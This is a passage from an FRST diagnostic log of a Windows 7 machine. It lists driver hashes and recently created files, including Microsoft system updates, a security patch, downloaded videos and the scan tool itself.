C:\Windows\System32\drivers\usbser.sys 4ACEE387FA8FD39F83564FCD2FC234F2
C:\Windows\System32\DRIVERS\usbser_lowerfltjx64.sys B826F3FF5A1975CC9096B4CAADDE77B6
C:\Windows\System32\DRIVERS\USBSTOR.SYS ==> MD5 is legit
C:\Windows\system32\drivers\usbuhci.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\VBoxDrv.sys CDA796F41C2B64CEEC143B3A86904CFB
C:\Windows\System32\DRIVERS\VBoxNetAdp.sys 8CD776EB77695524CCE594AAC3A71569
C:\Windows\System32\DRIVERS\VBoxUSBMon.sys 0E3C4F20B2CE21168F3242D9CAC6CBF2
C:\Windows\System32\drivers\vdrvroot.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vgapnp.sys ==> MD5 is legit
C:\Windows\System32\drivers\vga.sys ==> MD5 is legit
C:\Windows\system32\drivers\vhdmp.sys ==> MD5 is legit
C:\Windows\system32\drivers\viaide.sys ==> MD5 is legit
C:\Windows\system32\drivers\vmbus.sys 80E731A278695B47345D0171A19E428B
C:\Windows\system32\drivers\VMBusHID.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vmci.sys 6203C901DEFF10631AAD919B3BD1489B
C:\Windows\system32\Drivers\vmm.sys C6F8FBDE19960E0B172CD76D2677F5E2
C:\Windows\System32\DRIVERS\vmnetadapter.sys AEF53B47E960F227BF7638A6A1A9D5C6
C:\Windows\System32\DRIVERS\vmnetbridge.sys C234A1DC2F06A15B9210787F54253810
C:\Windows\system32\drivers\vmnetuserif.sys 25FBBC8C168AEE1753C330352EA6D009
C:\Windows\system32\drivers\VMparport.sys 35EF11B49B407FF34498019691147528
C:\Windows\System32\Drivers\vmusb.sys 415B167695C4B5960A13098622EF3D80
C:\Windows\system32\drivers\vmx86.sys D37CB37BF3FB6612BCA19D81EFA16122
C:\Windows\System32\drivers\volmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\volmgrx.sys ==> MD5 is legit
C:\Windows\System32\drivers\volsnap.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\VMNetSrv.sys 6BDCA00FC57CC40DA3C8E88B2CEA21AB
C:\Windows\system32\drivers\vsmraid.sys ==> MD5 is legit
C:\Windows\System32\drivers\vsock.sys EF1E48D431223F670CFFD6169B1A136F
C:\Windows\SysWow64\drivers\vstor2-mntapi10-shared.sys 65EFAEC68FA234F36880533A79D7B1C1
C:\Windows\System32\drivers\vwifibus.sys ==> MD5 is legit
C:\Windows\system32\drivers\wacompen.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\system32\drivers\wd.sys ==> MD5 is legit
C:\Windows\System32\drivers\Wdf01000.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wfplwf.sys ==> MD5 is legit
C:\Windows\System32\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\SysWOW64\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\WinUSB.sys FE88B288356E7B47B74B13372ADD906D
C:\Windows\System32\drivers\WmBEnum.sys 680A7846370000D20D7E74917D5B7936
C:\Windows\System32\drivers\WmFilter.sys 14C35BA8189C6F65D839163AA285E954
C:\Windows\System32\DRIVERS\wmiacpi.sys ==> MD5 is legit
C:\Windows\System32\drivers\WmVirHid.sys 8488DD91A3EE54A8E29F02AD7BB8201E
C:\Windows\System32\drivers\WmXlCore.sys 14802B3A30AA849C97CB968CCC813BF3
C:\Windows\system32\drivers\ws2ifsl.sys ==> MD5 is legit
C:\Windows\System32\drivers\WudfPf.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\WUDFRd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\xnacc.sys 4A5CE13408945E525503B5F73D29B9C5
C:\Windows\System32\DRIVERS\xusb21.sys 2C6BC21B2D5B58D8B1D638C1704CB494
C:\Program Files (x86)\Bignox\BigNoxVM\RT\YSDrv.sys 27578F40FD3C5EFD43563A266476F466
C:\Windows\System32\Drivers\a37m65i9.sys D41D8CD98F00B204E9800998ECF8427E
C:\Windows\System32\Drivers\ac2cjxl8.sys D41D8CD98F00B204E9800998ECF8427E
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Three Months Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-02-07 16:39 - 2018-02-07 16:40 - 000000000 ____D C:\FRST
2018-02-07 16:37 - 2018-02-07 16:40 - 000000000 ____D C:\Users\Markus\Desktop\FRST
2018-02-07 16:37 - 2018-02-07 16:37 - 002393088 _____ (Farbar) C:\Users\Markus\Downloads\FRST64.exe
2018-02-06 19:12 - 2018-02-06 19:13 - 073218333 _____ C:\Users\Markus\Downloads\The one and only Bugatti Aerolithe.mp4
2018-02-06 18:21 - 2018-02-06 18:22 - 112584201 _____ C:\Users\Markus\Downloads\1935 Bugatti Aerolithe Coupe - Jay Leno's Garage.mp4
2018-02-06 18:17 - 2018-02-06 18:17 - 114133884 _____ C:\Users\Markus\Downloads\History of the 1935 Bugatti Aerolithé.mp4
2018-02-05 11:15 - 2018-02-05 11:15 - 000299128 _____ C:\Windows\system32\FNTCACHE.DAT
2018-02-05 02:52 - 2018-02-05 02:52 - 000066744 _____ C:\Users\Markus\AppData\Local\GDIPFONTCACHEV1.DAT
2018-01-29 19:00 - 2018-01-29 19:00 - 000000000 ____D C:\Users\Markus\Documents\Tunngle
2018-01-28 21:34 - 2017-02-11 18:58 - 000462848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2018-01-28 21:34 - 2017-02-11 18:58 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2018-01-28 21:34 - 2017-02-11 18:58 - 000168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2018-01-28 21:34 - 2017-02-10 19:32 - 001551872 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2018-01-28 21:34 - 2017-02-10 19:32 - 001149440 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2018-01-28 21:34 - 2017-02-10 19:32 - 000803328 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2018-01-28 21:34 - 2017-02-10 19:32 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2018-01-28 21:34 - 2017-02-10 19:17 - 001081856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2018-01-28 21:34 - 2017-02-10 19:17 - 000628736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2018-01-28 21:34 - 2017-02-10 19:17 - 000312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2018-01-28 21:34 - 2017-02-09 19:36 - 000631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2018-01-28 21:34 - 2017-02-09 19:35 - 005548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2018-01-28 21:34 - 2017-02-09 19:35 - 000706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2018-01-28 21:34 - 2017-02-09 19:35 - 000154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2018-01-28 21:34 - 2017-02-09 19:35 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2018-01-28 21:34 - 2017-02-09 19:33 - 001732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 001212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2018-01-28 21:34 - 2017-02-09 19:32 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 001460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 001163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000250880 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:19 - 004000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2018-01-28 21:34 - 2017-02-09 19:19 - 003945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2018-01-28 21:34 - 2017-02-09 19:16 - 001314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000481792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:03 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2018-01-28 21:34 - 2017-02-09 19:03 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2018-01-28 21:34 - 2017-02-09 19:03 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2018-01-28 21:34 - 2017-02-09 19:02 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2018-01-28 21:34 - 2017-02-09 19:00 - 003220480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2018-01-28 21:34 - 2017-02-09 18:59 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2018-01-28 21:34 - 2017-02-09 18:58 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2018-01-28 21:34 - 2017-02-09 18:55 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2018-01-28 21:34 - 2017-02-09 18:55 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2018-01-28 21:34 - 2017-02-09 18:55 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2018-01-28 21:34 - 2017-02-09 18:54 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2018-01-28 21:34 - 2017-02-09 18:54 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2018-01-28 21:34 - 2017-02-09 18:53 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2018-01-28 21:34 - 2017-02-09 18:51 - 000032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcsPlugInService.dll
2018-01-28 21:34 - 2017-02-09 18:50 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2018-01-28 21:34 - 2017-02-09 18:50 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2018-01-28 21:34 - 2017-02-09 18:50 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2018-01-28 21:34 - 2017-02-09 18:50 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2018-01-28 21:34 - 2017-02-09 18:49 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2018-01-28 21:34 - 2017-02-09 18:49 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 18:49 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 18:49 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 18:49 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2018-01-28 21:34 - 2017-02-06 19:14 - 000733696 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2018-01-28 21:34 - 2017-01-13 21:00 - 000976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2018-01-28 21:34 - 2017-01-13 21:00 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2018-01-28 21:34 - 2017-01-13 20:45 - 000741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2018-01-28 21:34 - 2017-01-13 20:45 - 000084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2018-01-28 21:34 - 2017-01-11 21:01 - 001887744 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2018-01-28 21:34 - 2017-01-11 21:01 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2018-01-28 21:34 - 2017-01-11 20:43 - 001241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2018-01-28 21:34 - 2017-01-11 20:43 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2018-01-28 21:34 - 2017-01-06 21:00 - 001574912 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2018-01-28 21:34 - 2017-01-06 20:44 - 001329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2018-01-28 21:34 - 2016-11-20 17:07 - 000467392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2018-01-28 21:34 - 2016-10-08 16:06 - 000633296 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2018-01-28 21:34 - 2016-05-12 16:05 - 000297984 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2018-01-28 21:34 - 2016-05-12 16:04 - 000249352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2018-01-28 21:34 - 2016-03-24 01:43 - 000457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2018-01-28 21:34 - 2016-03-24 01:40 - 000546656 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2018-01-28 21:23 - 2018-01-28 21:23 - 034790450 _____ C:\Users\Markus\Downloads\windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu
2018-01-28 20:13 - 2018-01-28 20:13 - 000566381 _____ C:\Users\Markus\Downloads\uvs_update.zip
2018-01-28 20:12 - 2018-01-28 20:13 - 002973143 _____ C:\Users\Markus\Downloads\uvs_v400.zip
2018-01-28 18:39 - 2018-01-28 18:39 - 000000242 _____ C:\Windows\system32\Partizan.RRI
